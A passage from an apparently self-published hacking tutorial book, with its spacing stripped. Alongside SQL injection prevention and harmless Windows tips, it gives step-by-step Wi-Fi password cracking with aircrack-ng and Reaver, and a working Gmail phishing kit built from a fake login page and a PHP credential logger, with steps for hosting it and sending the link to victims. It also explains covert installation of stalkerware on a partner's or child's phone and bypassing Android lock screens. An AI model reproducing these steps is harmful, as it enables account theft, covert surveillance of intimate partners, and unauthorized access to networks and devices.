1.)ThesignificantprevalenceofSQLInjectionvulnerabilities,and2.)Theattractivenessofthetarget(i.e.,thedatabasetypicallycontainsalltheinteresting/criticaldataforyourapplication).

It’ssomewhatshamefulthattherearesomanysuccessfulSQLInjectionattacksoccurring,becauseitisEXTREMELYsimpletoavoidSQLInjectionvulnerabilitiesinyourcode.

SQLInjectionflawsareintroducedwhensoftwaredeveloperscreatedynamicdatabasequeriesthatincludeusersuppliedinput.ToavoidSQLinjectionflawsissimple.Developersneedtoeither:a)stopwritingdynamicqueries;and/orb)preventusersuppliedinputwhichcontainsmaliciousSQLfromaffectingthelogicoftheexecutedquery.

ThisarticleprovidesasetofsimpletechniquesforpreventingSQLInjectionvulnerabilitiesbyavoidingthesethreeproblems.Thesetechniquescanbeusedwithpracticallyanykindofprogramminglanguagewithanytypeofdatabase.

SQLinjectionflawstypicallylooklikethis:

Thefollowing(Java)exampleisUNSAFE,andwouldallowanattackertoinjectcodeintothequerythatwouldbeexecutedbythedatabase.Theinvalidated“customerName”parameterthatissimplyappendedtothequeryallowsanattackertoinjectanySQLcodetheywant.Unfortunately,thismethodforaccessingdatabasesisalltoocommon.

Stringquery=“SELECTaccount_balanceFROMuser_dataWHEREuser_name=“+request.getParameter(“customerName”);

try{Statementstatement=connection.createStatement(…);ResultSetresults=statement.executeQuery(query);

}PREVENTIONSOption1:PreparedStatements(ParameterizedQueries):

Theuseofpreparedstatements(parameterizedqueries)ishowalldevelopersshouldfirstbetaughthowtowritedatabasequeries.Theyaresimpletowrite,andeasiertounderstandthandynamicqueries.ParameterizedqueriesforcethedevelopertofirstdefinealltheSQLcode,andthenpassineachparametertothequerylater.Thiscodingstyleallowsthedatabasetodistinguishbetweencodeanddata,regardlessofwhatuserinputissupplied.Preparedstatementsensurethatanattackerisnotabletochangetheintentofaquery,evenifSQLcommandsareinsertedbyanattacker.IfanattackerweretoentertheuserID‘or‘1’=‘1,theparameterizedquerywouldnotbevulnerable.

2.UsedynamicSQLonlyifabsolutelynecessary.

DynamicSQLcanalmostalwaysbereplacedwithpreparedstatements,parameterizedqueries,orstoredprocedures.Forinstance,insteadofdynamicSQL,inJavayoucanusePreparedStatement()withbindvariables,in.NETyoucanuseparameterizedqueries,suchasSqlCommand()orOleDbCommand()withbindvariables,andinPHPyoucanusePDO

withstronglytypedparameterizedqueries(usingbindParam()).

Inadditiontopreparedstatements,youcanusestoredprocedures.Unlikepreparedstatements,storedproceduresarekeptinthedatabasebutbothrequirefirsttodefinetheSQLcode,andthentopassparameters.

3:-EscapingAllUserSuppliedInput

Thisthirdtechniqueistoescapeuserinputbeforeputtingitinaquery.Ifyouareconcernedthatrewritingyourdynamicqueriesaspreparedstatementsorstoredproceduresmightbreakyourapplicationoradverselyaffectperformance,thenthismightbethebestapproachforyou.However,thismethodologyisfrailcomparedtousingparameterizedqueriesandicannotguaranteeitwillpreventallSQLInjectioninallsituations.Thistechniqueshouldonlybeused,withcaution,toretrofitlegacycodeinacosteffectiveway.Applicationsbuiltfromscratch,orapplicationsrequiringlowrisktoleranceshouldbebuiltorre-writtenusingparameterizedqueries.

Thistechniqueworkslikethis.EachDBMSsupportsoneormorecharacterescapingschemesspecifictocertainkindsofqueries.Ifyouthenescapeallusersuppliedinputusingtheproperescapingschemeforthedatabaseyouareusing,theDBMSwillnotconfusethatinputwithSQLcodewrittenbythedeveloper,thusavoidinganypossibleSQLinjectionvulnerabilities.

4.Installpatchesregularlyandtimely.

Evenifyourcodedoesn’thaveSQLvulnerabilities,whenthedatabaseserver,theoperatingsystem,orthedevelopmenttoolsyouusehavevulnerabilities,thisisalsorisky.Thisiswhyyoushouldalwaysinstallpatches,especiallySQLvulnerabilitiespatches,rightaftertheybecomeavailable.

5.Removeallfunctionalityyoudon’tuse.

Databaseserversarecomplexbeastsandtheyhavemuchmorefunctionalitythanyouneed.Asfarassecurityisconcerned,moreisnotbetter.Forinstance,thexp_cmdshellextendedstoredprocedureinMSSQLgivesaccesstotheshellandthisisjustwhatahackerdreamsof.Thisiswhyyoushoulddisablethisprocedureandanyotherfunctionality,whichcaneasilybemisused.

6.UseautomatedtesttoolsforSQLinjections.Evenifdevelopersfollowtherulesaboveanddotheirbesttoavoiddynamicquerieswithunsafeuserinput,youstillneedtohaveaproceduretoconfirmthiscompliance.ThereareautomatedtesttoolstocheckforSQLinjectionsandthereisnoexcusefornotusingthemtocheckallthecodeofyourdatabaseapplications.

SQLINJECTME

TESTINGSQLINJECTIONBYUSINGTOOL

OneoftheeasiesttooltotestSQLinjectionsistheFirefoxextensionnamedSQLInjectME.Afteryouinstalltheextension,thetoolisavailableintheright-clickcontextmenu,aswellasfromTools→Options.ThesidebarofSQLInjectMEisshowninthenextscreenshotandasyoucanseetherearemanytestsyoucanrun:

Youcanchoosewhichteststorunandwhichvaluestotest.WhenyoupressoneoftheTestbuttons,theselectedtestswillstart.Whenthetestsaredone,youwillseeareportofhowthetestsended.

TherearemanyoptionsyoucansetfortheSQLInjectMEextension,asshowninthenexttwopictures:

Asyousee,therearemanystepsyoucantakeinordertocleanyourcodefrompotentialSQLinjectionvulnerabilities.Don’tneglectthesesimplestepsbecauseifyoudo,youwillcompromisethesecuritynotonlyofyoursitesbutalsoofallthesitesthatarehostedwithyourwebhostingprovider.

WPA2TESTING

WI-FIHACKINGUSINGBACKTRACK

AfterperformingtheSQLinjection,Icanbetthatnowyouhavetheendlesscuriositytoexploremoreabouttheethicalhacking.AndasaccordingtoyourneednowinthisarticlewearegoingtoperformahardcorehackusingBacktrackLinux.wearegoingtolearnthathowtocracktheWI-FIusingBacktrack.onemorethingIwanttoaddherethatallthesestuffIamsharingwithyouisonlyforstudypurpose.ifyouhavetheblackintentionsjustleavethebooknow.Ifyouareperformingthisarticleonyourcomputer,youwillberesponsibleforanydamageoccurredbyyou.

Solet’sstartthearticle:

NowletusstartwiththeWi-Ficracking.ButbeforestartingthetutorialletmegiveyouasmallintroductiontowhatWi-Fihackingisandwhatisthesecurityprotocolsassociatedwithit.

Inasecuredwirelessconnectedthedataoninternetissentviaencryptedpackets.Thesepacketsaresecuredwithnetworkkeys.Therearebasically2typesofsecuritykeys:

WEP(WirelessEncryptionProtocol):-Thisisthemostbasicformofencryption.Thishasbecomeanunsafeoptionasitisvulnerableandcanbecrackedwithrelativeease.Althoughthisisthecasemanypeoplestillusethisencryption.WPA(WI-FIProtectedAccess):Thisisthemostsecurewirelessencryption.Crackingofsuchnetworkrequiresuseofawordlistwithcommonpasswords.Thisissortofbruteforceattack.Thisisvirtuallyuncrackableifthenetworkissecuredwithastrongpassword

Solet’sbegintheactualWi-FiHackingtutorial!InordertocrackWi-Fipassword,yourequirethefollowingthings:

FortheWi-FihackingyouneedtoinstalltheBacktrackonyourcomputer.

IamassumingthatyouhavealreadyinstalledtheBacktrackonyourpc.Ifnotit’sveryeasytoinstallbymakingbootableliveCD/DVD.ForinstallingprocessesyoucanjustGoogleit.Youwillgetiteasily.

Nowopentheconsolefromthetaskbar,Clickontheiconagainstthedragonlikeiconinthetaskbarintheabovescreenshot.YouwillhaveaCommandPromptlikeShellcalledasconsoleterminal.

1)Let’sstartbyputtingourwirelessadapterinmonitormode.Itallowsustoseeallofthewirelesstrafficthatpassesbyusintheair.Typeairmon-ngintheconsoleterminalandpressEnter.Youwillhaveascreenlikethis,notedownthenameofinterface,inthiscasethenameiswlan0.

2)Nowtypeifconfigwlan0downandhitenter.

Thiscommandwilldisableyourwirelessadapter;wearedoingthisinordertochangeyourMACaddress.

Now,youneedtohideyouridentitysothatyouwillnotbeidentifiedbythevictim.todothisyouneedtotypeifconfigwlan0hwether00:11:22:33:44:55andhitenter.

ThiscommandwillchangeyourMACaddressto00:11:22:33:44:55.3)Nowthenextworkistotypeairmon-ngstartwlan0andpressenter.

Thiswillstartthewirelessadapterinmonitormode.Notedownthenewinterfacename,itcouldbeeth0ormon0orsomethinglikethat.

Theabovecommandintheconsolehasstartedyournetworkadapterinmonitormodeasmon0:

4)Nowthatourwirelessadapterisinmonitormode,wehavethecapabilitytoseeallthewirelesstrafficthatpassesbyintheair.Wecangrabthattrafficbysimplyusingtheairodump-ngcommand.

Thiscommandgrabsallthetrafficthatyourwirelessadaptercanseeanddisplayscriticalinformationaboutit,includingtheBSSID(theMACaddressoftheAP),power,numberofbeaconframes,numberofdataframes,channel,speed,encryption(ifany),andfinally,theESSID(whatmostofusrefertoastheSSID).Let’sdothisbytyping:

airodump-ngmon0

Intheabovescreenshotthereisalistofavailablenetworks,Choose1networkandnotetheBSSIDandchannelofit.5.)Typeairodump-ng-cchannelno–bssidBSSIDN1mon0-wfilenameandhitenter.

Replacechannelno.andBSSIDN1withthedatafromstep4.Replacethemon0withnetworkinterfacenamefromstep3.Inplaceoffilenamewriteanynameanddorememberthat.Betterusefilenameitself.

Thiscommandwillbegincapturingthepacketsfromthenetwork.YouneedtocapturemoreandmorepacketsinordertocracktheWi-Fipassword.Thispacketcapturingisaslowprocess.

6.)Tomakethepacketcapturingfaster,wewilluseanothercommand.Openanewshell,don’tclosethepreviousshell.Innewshelltypeaireplay-ng-10-aBSSIDN1-h00:11:22:33:44:55mon0andhitenter.

ReplacetheBSSIDN1withthedatafromstep4andmon0fromstep3.Thiscommandwillboostthedatacapturingprocess.The-1tellstheprogramthespecificattackwewishtousewhichinthiscaseisfakeauthenticationwiththeaccesspoint.The0citesthedelaybetweenattacks,-aistheMAC

addressofthetargetaccesspoint,-hisyourwirelessadaptersMACaddressandthecommandendswithyourwirelessadaptersdevicename.

7.)Nowwaitforfewminutes,lettheDATAintheotherconsolereachacountof5000.

8.)Afteritreaches5000,openanotherconsoleandtypeaircrack-ngfilename-01.capandhitenter.Replacethefilenamewiththenameyouusedinstep5.Add-01.captoit..capistheextensionoffilehavingcaptureddatapackets.Aftertypingthiscommand,aircrackwillstarttryingtocracktheWi-Fipassword.IftheencryptionusedisWEP,itwillsurelycrackthepasswordwithinfewminutes.

IncaseofWPAusethefollowingcommandinsteadoftheaboveaircrack-ng-w/pentest/wireless/aircrack-ng/test/password.lst-bBSSIDN1filename-01.cap

ReplaceBSSIDN1andfilenamewithdatayouused./pentest/wireless/aircrack-ng/test/password.lstistheaddressofafilehavingwordlistofpopularpasswords.IncaseofWPAaircrackwilltrytobruteforcethepassword.AsIexplainedabovethattocrackWPAyouneedafilehavingpasswordstocracktheencryption.Ifyouareluckyenoughandthenetworkownerisnotsmartenough,youwillgetthepassword.

PREVENTION:

Forthepreventionfrombeinghackedyoucanrefertothechapter

“PASSWORDCREATINGPOLICIES”.

NEWBIE’SWAYTOWARDSREVERSEENGINEERING

Now-a-dayspeopleexpectmorethansomethingwithanapplicationasitisprovidedbythedevelopers.Peoplewanttousethatspecificapplicationaccordingtotheirownpreferences.Sonowweareherewithanarticleonthetopicreverseengineering.Let’sstartwithsimpleengineering,“simpleengineering”isthetasktodevelop/buildsomethingBUTReverseengineeringreferstothetasktoredevelop/re-buildsomething.Insimplewordsreverseengineeringisthetasktomodifythesourcecodeoftheapplicationtomakeitworkaccordingtoourway,Reverseengineeringisaverycomplicatedtopicandisverydifficulttounderstandforbeginnersasitrequiresapriorknowledgeofassemblylanguage.

Developingiseasybuttore-developingisnoteasy!!Becausewhiledevelopmentaprogrammerhastodealwiththefunctions,pointers,conditions,loopsetc…ButwhileDE-compilationprocessweneedtodealwithregisters!

Generally32bit/64bitwindowssupportsmainly9registers:–

PerformingRegisters———————–>EAX:ExtendedAccumulatorRegister

>EBX:BaseRegister>ECX:CounterRegister>EDX:DataRegister

Index———>ESI:SourceIndex

>EDI:DestinationIndex

Pointer———–>EBP:BasePointer

>ESP:StackPointer>EIP:InstructionPointerSo,let’smovetowardsourway“Howtomodifytheapplications”Thegeneralrequirementsyouneedforthemodificationarelistedbelowandeasilyavailableontheinternet:–1.OllyDBG

2.CrackMeApp(clickheretodownload)(registerandactivateyouraccountbeforedownload)PROCESS:

Whenyouhavedownloadedboththeapps,firstofallyouneedtolaunchtheCrackMe

App.Itwillaskyoutoenterthepassword,enteranypasswordyouwantandhiton“OK”.

Nowitwillshowyoutheerrorthat“Youarenotauthorizedtousetheapplication”.

NowopentheOllyDBGandopentheCrackmeappinit.WhenyouhaveopenedtheCrackmeappinOllyDBG,nowintheupperleftbox,whilescrollingupyoufindthestatementlikethis:–JESHORTPassword.00457728

Basically,thisisaconditionaljumpthatmeansiftheconditionistruethenitwilljumpto00457728Whichshowsusthemessage“Youarenotauthorizedtousetheapplication”andiftheconditionisnottrueitjustcontinuesreadingthecode,Sowedon’tneedthisjumptoworkaswedon’twanttogettheerrormessage.

Nowforremovingtheerrormessage,wecanchangeJESHORTPassword.00457728toJNESHORTPassword.00457728,JNE(JumpIfNotEqual)meansthatifthepasswordiscorrectitwillgiveyoutheerrormessageandifthepasswordisincorrectitwillgiveyouthecorrectmessage.

ForchangingthequeryjustdoubleclickthelineJESHORTPassword.00457728andsimplychangeittoJNESHORTPassword.00457728andHiton“Assemble”.

NowHITonblue“PLAY”buttonintheuppersideoftheOllyDBGtostarttheCrackmeappagainandenterthepasswordthenitwillgiveyouthecorrectmessage.

PHISHINGATTACKAHEAD

EMAILANDFACEBOOKHACKINGBYPHISHING

Whatisphishing?

Phishingisanattemptbythesendertohavethereceiveroftheemailtoreleasetheirpersonalinformationi.e.theattackerluresthevictimstogivesomeconfidentialinformation.

Whyphishing?

Therearemanypasswordcrackingtoolsthatarecomingandgoinginto/fromthemarket.Butphishingisthemostefficientmethodtostealconfidentialinformationlike,passwords,Creditcardnumbers,Bankaccountnumbersetc.

Howphishingworks?

Itworksjustlikenormalfishing.Afishermangenerallythrowsbaitintothewatertolurethefish.Thenafishcomestotakethefoodfeelingthatitislegitimate.Whenitbitesthebait,itwillbecaughtbythehook.Nowthefishermanpullsoutthefish.

Inthesameway,thehackersendsafakeloginpagetothevictim.Thevictimthinksthatitisalegitimateoneandentershisconfidentialinformation.Nowthedatawillbewiththehacker.Now,let’slearnhowtohackbyphishing:IamselectingGmailaccounttobehackedbyphishing.

Forphishingyouneedthefollowingstuffs:Firstofallyouhavetoopenthegamil.combyyourbrowserandwhenpageopencompletely,justgivearightclickonthepageandadialogueboxwillopensafteryouhavinganoption“viewpagesource”init.Clickonthe“viewpagesource”optionandyouseethatthesourcecodeofthatpagewillopensafteryou.Thenpressctrl+Ftoopenthetext/wordfindingbox.Type“action=”andreplaceitwithanything.phpSuchas“action=mail.php”Thenfindforthe“method=”andalsoreplaceitwith“get”.Suchasmethod=”get”.

Thensavethefilebyanything.htmlSuchas“Gmail.html”Thencreateablanknotepadfile“log.txt”Theagainopenthenotepadandtypethefollowingcodes:

<?phpheader(“Location:http://www.Gmail.com”);$handle=fopen(“logs.txt”,“a”);foreach($_GETas$variable=>$value){fwrite($handle,$variable);fwrite($handle,“=”);fwrite($handle,$value);fwrite($handle,“\r\n”);}fwrite($handle,“\r\n”);fclose($handle);exit;?>

Andsaveitas“mail.php”(savethisfilebysamenameasyouhavereplacedthe“action=”)Nowfinallyyouhavethethreefileswhicharerequiredforthephishing.1)Gmail.html(fakeloginpage)2)mail.php(tocapturethelogindetails)3)log.txt(tostorethecaptureddetails)

Procedure:step1:createanaccountinanyfreewebhostingsitelikewww.bythost.comwww.000webhost.comwww.ripway.com

www.my3gb.com

step2:Nowuploadallthethreefilesyouhavedownloaded.(Ihavetakenwww.my3gb.com)step3:Givethelinkofthefakepagetoyourvictim.

eg:www.yoursitename.my3gb.com/Gmail.htmlStep4:whenheclicksthelink,itopensafakeGmailpagewhereheentershislogindetails.Whenheclickssigninbutton,hislogin

detailswillbestoredinlog.txtfile.Demonstration:HereIhaveuploadedmyscriptsonto

www.my3gb.com

AndcopytheGmail.htmllinkwhichyouhavetosendthevictim.iclickedtheGmail.htmllinkAfakepagewasopenedwhereienteredmylogindetails.

ThispagewilllooksexactlysimilartotheoriginalGmailloginpage.Andwhenthevictimentershis/herlogindetailsforlogginginintohis/heraccount.Now,thistimethevictimwillredirectedtotheoriginalGmailloginwebsite.Thevictimwillevendon’tknowthathis/heraccountgothacked.Victimwillthinkthatthepagegetsreloadedduetointerneterrorsorloginmistakesetc.

Nowhis/herlogindetailswerecapturedbythephpscriptandstoredinlog.txtfileasshowninthefigurebelow:

InthesamewayyoucanhackFACEBOOKaccountsandothersocialnetworkingaccounts.Howtoprotectourselvesfromphishing?Don’tuselinksBesuspiciousofanye-mailwithurgentrequestsByusingsecuredwebsitesUsingefficientbrowsersUsingAntivirusorinternetsecuritysoftware.

USBSECURITY

SecuringPenDrivesFromMaliciousViruses

Today,agiantdownsideforwindowsuseristosecuretheirdatafromviruses.Especially,inPendrives,nobodyneedstokeeptheirvitaldatainpendrivesasaresultofpendrivessquaremeasuretransportabledevicesandthroughsharingdataitmaygetinfectedbyviruslikeshortcutvirus,Autorun.inf,andnewfoldervirusetc.SomefolksrecovertheirdatabymerelyusingCommandprompthoweversomefolksassumethere’ssolelypossibilityleftanditistoformatthependrive.

So,ifyourpendriveisinfectedbyanyofthosevirusyoucanmerelyfollowthesesteptoinduceyourhiddendataback.

OpenCMD(commandprompt)OpenFlashdriveinCMD(ifyourdriveis‘G’thanenter‘G:’afterc:\user\press[ENTER])Nowtypefollowingcommandandhitenter:attrib-s-h/s/d

Nowopenyourpendriveinwindowsyoumayseeallofyourfiles.Howeverwait!isitenough?Noway!yourpendriveisstillnottotallysecure.Higherthancommandsimplyshowsallofyourfilesthatsquaremeasurehiddenbyviruses.IfyouwanttoshieldyourUSBfromobtainingunwantedfilesi.e.virus,worm,spy,Trojanetc.thenyouneedtofollowthesesteps.

WhatI’mgoingtotellyouisthatawaytosetupyourregistrytofinishacomputerfromsavingfilestoyourUSB.Ifyouhavewindowssevenorwindowseightthenyou’llimmobilizethewritingchoicetoUSBdrives.ThistrickisincrediblyusefulifyouhavevirusinyourlaptopandwanttorepeatfilesfromaUSBDrivehoweveralsodon’twanttotransfervirustotheUSB.FollowthegivenstepstodisabletheUSBwritingoption:

Opennotepadandreplicaandpastethefollowing:

WindowsregistryEditorVersion5.00[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies]

“WriteProtect”=dword:00000001Nowkeepthefilewiththeextension“.reg”.

Clickonthefileyounowsaved.withinthepop-upwindowselectedaffirmativeandthenOK.That’sityourUSBiscurrentlysecureTURNINGTHESECURITYOFF

TojustoffthissecuritymeasureOpennotepadandcopyandpastethefollowing:WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies]“WriteProtect”=dword:00000000

Nowoverlookedthefilewiththeextension“.reg”.Clickonthefileyoucurrentlysaved.withinthepop-upwindowclickaffirmativeandthenOK.That’sityourdefenseiscurrentlydisabled.

PDFSECURITY

HOWTOPROTECTYOURPDFFILESFROMCOPYING

Nowthesedaysit’sabigdealtosecureyourPDFdocuments.InthisarticleIwillshowyouthat“HOWTOPROTECTYOURPDFFILESFROMBEINGCOPIEDFORPIRATIONANDOTHERMALITIOUSINTENTIONS”.

ForprotectingyourPDFfilesyoucanuseatool“A-PDFpasswordsecurity”toprotectaPDFfile.YoucansetpasswordandpreventpeoplefromcopyandpastePDFcontents,hereisaneasytutorialtomakeyouawareabouttheuseofthattool.

Installthe“A-PDFpasswordsecurity”.Launchtheprogramandopenthepasswordprotectwizard.

selecttheoption“singlepdfdocumentsecurity”andpushthebutton“next>”Click“browse”buttontoopenapdffilewillbeencrypted,select thesecuritylevelandencryptionmethod.Youcansetuppasswordforopeningandmodificationofyourdocument.

Click“save”or“saveas”tosetadocumentopenpasswordanddisallowcopyingpermission.

AftersavingthefileyouwillchoosetoopensavedPDFfilewiththedefaultPDFviewer,setanotherPDFfilesecurityoropendestinationfolderinwindowsexplorer.

OpensavedPDFfilewiththedefaultPDFviewer.

NOTIFYME

SENDINGAMESSAGETOOTHERUSERINYOURPC

Inthisarticlewearegoingtolearnthathowtosendanymessagetotheotheruseraccountassociatedwithyourownpc.

Let’sassumeifyouwanttoleaveanymessageforyourbrotherandsisterwhohaveuseraccountsassociatedwiththesamepcinwhichyouhavealsoauseraccount.

Sofollowthesestepstopassanymessagewhichyoutoanotheruseraccountathisnextlogin.

OpenthetaskmanagerofyourpcbyclickingCTRL+ALT+DELkeyssimultaneously.Thenclickonuseroptiontoviewtheavailableuseraccountassociatedwithyourpc.

Selectanyanotheruseraccountwhichyouwanttopassthemessage.Thenclickonthe“sendmessage”optionplaceinthelowerrightcorner.

Adialogueboxwillbeopenafteryou.Typeanymessageyouwanttoconveythem.If youwanttoshockthemthenyoucantype“HELLOUSER…YOURCOMPUTERISINFECTEDBYTROJAN”

Andwhenanotheruserlogintohis/heruseraccount,thesamemessagewillbedisplayedtohim.

“IAMAFOLDERIDON’THAVEANAME”––—?HOWTOCREATEAFOLDERWITHEMPTYNAME

Thisisthemostinterestingarticleofthisbook,andhereIwillshowyouthathownocreateafolderwithoutnamingit.Sometimesitwillbeveryusefulforyou.

Let’sassumeyouhavehidedanyfoldersimply.Andwhenyouwillsearchitbynamefromtheaddressbaritwillbeopenedeasily.Solet’sthinkthatiftherewillbeanyfolderwithoutnamethenhowcanitbepossibletosearchitfromaddressbarorsearchbox.Sofollowthesestepstocreateafolderwithoutname:Openthelocationwhereyouwanttocreatethefolder.Justrightclickanywheretocreatethefolder.

WhenitaskstorenamethefolderjustclickALTkeyandbykeeppressingtheALTkeypress“2,5,5”onebyone.Andthenenter.

Youwillfindthatthereitcreatesafolderwithouthavinganyname.

SPYINGWITHANDROID

HACKINGANDROIDPHONE

Hellofriends,nowinthisarticlewewilllearnthathowtospyoveranandroidphone.Nowthesedaysaretheeraofsmartphonesbasedonandroidspecially.InthisarticleIwillshowyouthathowtogetthedetailsofthevictimbyspyingovervictim’sandroidphone.Thisisthebestwaytokeeptrackingyourchildandalsoyourgirlfriends.

ForspyingnowIamusingatoolnameasTHETRUTHSPY.

Byusingthistoolyoucaneasilykeeptrackingthevictim’sandroidphone.

Iamshowingyouthescreenshotsofthosethingswhichwecanspyfromanandroidphone…suchasCALLHISTORY,WHATSAPPMESSAGES,andSMSDETAILSetc.…listisshownbelowinthescreenshot.

Note:-thistoolisalsoavailableforIOSdevices.

Youhavetofollowthestepstostartspying.

Firstofallyouhavetodownloadtheapkfileofthistoolandinstallitonthevictim’sandroidphoneandlogintoit.Thistoolisonlyof800kbsoyoucaneasilymanageitwithinseconds.Averyinterestingthingisaboutthistoolisthatyoucanalsohidethistoolfromthevictimsandroidphone.sothatvictimwillnotawareaboutit.Nowyoucandownloadtheapkfilefromthewebsite(my.thetruthspy.com).Afterinstallingtheappgoonthesamewebsiteoftheappbyyourcomputerandresisterusingyouremailidandlogintoviewthedetailsofthevictim’sandroidphone.ForgettingdetailsgetensurethatthedataconnectionofthevictimsphoneshouldbeON.Whenyouwanttounhidetheappfromthevictim’sphonejust makeacallfromthevictim’sphoneto#2013*.

Note:-sometimesthis“thetruthspy”isstopworking.soyoucanalsosearchanyotherspytoolbysimpleGooglesearches.Youwillfindalotoftoolslikethisandhavealmostsamefunctioning.

MOBILE:“ICANCONTROLYOURPC”

FULLCONTROLYOURPCBYPHONE

NowIhaveaveryinterestingthingforyou……Iknowyougottiredbythosedifficulthackingschaptersmentionedinabovechapters.

InthisarticleIaregoingtotellyouthathowtocontrolyourcomputerfullybyyourmobilephone.It’saveryinterestingthingforyouifyougottiredbyusingthetrackpadandkeyboardofyourcomputer.

Solet’sseehowtodoit:InthisarticleIamgoingtouseatoolnameasUNIFIEDREMOTEwhichisusedtoremoteourpc.

Unifiedremoteisanappthatletsyoucontrolyourentirewindowscomputerfromyourandroiddevice.itturnsyourdeviceintoaWi-FiorBluetoothremotecontrolforalltheprogramsonyourcomputer.Withthisappyoucancontrolawiderangeofapplications,includingsimplemouseandkeyboard,mediaplayersandotherexternalgadgetsthatcanbeconnectedtoyourcomputer(suchasUSB-UIRTandtellstick).itevenprovidesextensivecapabilitiesforuserstocreatetheirowncustomremotesfortheirneeds.

Youhavetofollowthesimplestepstoremoteyourpcbyunifiedremote:

Downloadandinstalltheunifiedremoteserveronyourcomputer(windows).YoucaneasilyfinditbyyourGooglesearches.Whenyouinstalledit…..Launchit.

ConnectyourandroidphonetothesameWi-Finetworkasyourcomputer.AlternativelyifyourcomputeridBluetoothready,pairitwithyourphone.

Downloadandinstalltheapkfileofunifiedremotefromtheplaystore.Atlaunch,confirmthatyouhaveinstalledtheserver.

Thenaddanewserver,select“automatic”andtheappwillfind yourcomputer.Tapyourcomputersnametoconnect.Nowyouarereadytostartcontrollingyourcomputerwithphone.Tapremoteintheapp.

The“Basicinput”remotewillpromptthemouse,whichyoucanuseasatrackpad.Instructionsforusingthemousewillappearonscreen.Alsotherearelotofoptionsareavailablebywhichyoucancontrolyourcomputerindifferentways.

Example:-keyboardcontrolling,filemanager,media,power,start,YouTubeetc.

LAUNCHGODMODE

LAUNCHINGWINDOWSGODMODE

HereIhaveanicewindowstrickforyouwhichsavesyourmuchtime.InthisarticlewewilllearnthathowtolaunchGODMODEinyourcomputer.

Windowsgodmodeisasimplewaytocentralizedaccessalltheadministrativeoptionsthatarenormallyseeninsidecontrolpanelintoanewlycreatedfolderwhichcanbeplacedanywhereinsidecomputer.Usuallytheadministrativeoptionsareseenscatteredinsidethecontrolpanelarrangedindifferentcategoriesandsubcategories.Windowsgodmodearrangesalltheadministrativeoptionsinsideonesinglewindow.Youfinditmuchmoreneatlyarrangedanduserfriendly.

Let’sseehowtolaunchgodmodeinsimplesteps:Youneedtocreateanewfolderforthislaunch.Rightclickatthewindowwhereyouwanttocreateanewfolder.Whenitasksyoutorenamethatfolderyouhavetoenter

followingcodeswithanyword.

Example:Ujjwal.{ED7BA470-8E54-465E-825C99712043E01C}OrSaurabh.{ED7BA470-8E54-465E-825C-99712043E01C}OrAnything.{ED7BA470-8E54-465E-825C-99712043E01C}

Don’tforgettousecurlybrackets.Afterrenamingthefolderpressenter.

Andyouwillseethattheiconofthatfolderwillbechangedandwhenyouwillopenityouwillfindallthesettingsarrangedinwellmannerinit.

CRACKINGLOCKSCREEN

HOWTOCRACKANDROIDLOCKSCREEN

Inthisarticlewearegoingtolearnthathowtobypasstheandroidlockscreen.

WearegoingtobypassthelockscreenusingatoolnameasAromaFilemanager.

Thisisthebestmethodforcrackandroidpatternlock;youmusthavecustomrecoveryinstalledonyourdeviceinordertousethismethod.Let’sstartthecrackingandroidlockscreen.

FirstofalldownloadAromaFilemanagerzipfile.Googleitandyouwillfinditeasily.

NowcopythisAromafilemanagerziptorootofyourSDcard.AftercopyingzipfiletoSD,bootyourphoneintoRecoverymode(Eachphonehasdifferentkeycombinationtobootupinrecoverymode,youcansearchitonGoogle).

Inrecoverychoose“installzipfromSDcardorapplyupdatefromSDcard”,nowselectAroma.zipwhichyouhavedownloadedearlier.

AfterinstallingorupdatingAromafilemanagerwillopen,usevolumeupanddownkeysforScrollingasyoudoinrecovery.InAromafilemanagergotomenuwhichislocatedatbottomstripafterclickingmenuselectsettings.Gotobottominsettingsandthenselect“mountallpartitionsinstartup”aftermountingexitAromafilemanager.NowlaunchAromafilemanageragain.InaromaGotoData>>System.Youwillfind“Gesture.key”ifyouhaveappliedgesturelockor“Password.key”ifyouhaveappliedpassword.

Longpress“Gesture.key”or“Password.key”whichoneisavailable,afterlongpressingit

willpromptsomeoption,choosedeleteanddeletethatfileandrestartyourdevice(firstexitfromaromafilemanagerthenrestartyourphone).

Yuppie!Yourphoneisunlockednow.Afterrebootingitwillaskyouforlockpatterndon’tworrynowyoucanuseanypattern,youroldpatternhasgoneaway.

REAVERBACKTRACK

WI-FICRACKINGUSINGREAVERINBACKTRACK

Well,inthisarticleIwillshowyouthathowtocrackWPA2-PSKkeyusingatoolnamesasREAVER.Reaverusetocrackthekeybybruteforcemethod.

Let’sseehowtocrackthekeyusingBacktrack.NowIamusingBacktrack5r3.Soopentheconsoleandfollowthegivensteps:Firstthingistodoisrunthecommand:Airmon-ngstartwlan0

Nowthenextcommandtowriteis:Airodump-ngwlan0WiththiscommandwelookforavailablenetworksandinformationregardingBSSID,

PWRBeacons,data,channeletc… Nowyouneedtorunthefollowingcode:Reaver-imon0-b-cBSSID–cchannelnetworknameNote:-UsethevaluesofBSSIDchannelandnetworknameintheabovecommand.

Ihaveexecutedthecommandanditstartstoworkasshowninthepicturebelow:

Nowyouhavetowait,timetakenisdependentonthestrengthofpasswordandthespeedofyourinternetconnection,

AndfinallyafterbruteforcingitwillgiveyoutheWPA2pin.

WINDOWSSHORTCUTS

SOMEUSEFULWINDOWSSHORTCUTS

1.WindowsKey+Tab:Aero2.WindowsKey+E:LaunchesWindowsExplorer3.WindowsKey+R:RunCommandbox4.WindowsKey+F:Search5.WindowsKey+X:MobilityCenter6.WindowsKey+L:LockComputer7.WindowsKey+U:EaseofAccessbox8.WindowsKey+P:Projector9.WindowsKey+T:CycleSuperTaskbarItems10.WindowsKey+S:OneNoteScreenClippingTool11.WindowsKey+M:MinimizeAllWindows12.WindowsKey+D:Show/HideDesktop13.WindowsKey+Up:MaximizeCurrentWindow14.WindowsKey+Down:RestoreDown/Minimize15.WindowsKey+Left:TileCurrentWindowtotheLeft16.WindowsKey+Right:TileCurrentWindowsRight17.WindowsKey+#(anynumber)18.WindowsKey+=:Magnifier19.WindowsKey+plus:Zoomin20.WindowsKey+Minus:Zoomsout21.WindowsKey+Space:Peekatthedesktop

DATAFORENSICS

HOWTORECOVERPERMANENTLYDELETEDFILES

Inthisarticlewewilllearnthathowtorecoverourpermanentlydeletedfilesfromourcomputer.Sometimesyourimportantdataisaccidentlydeletedfromyourcomputeraswellasfromrecyclebinalso,andit’sveryimportanttorecoverthatfileordata.

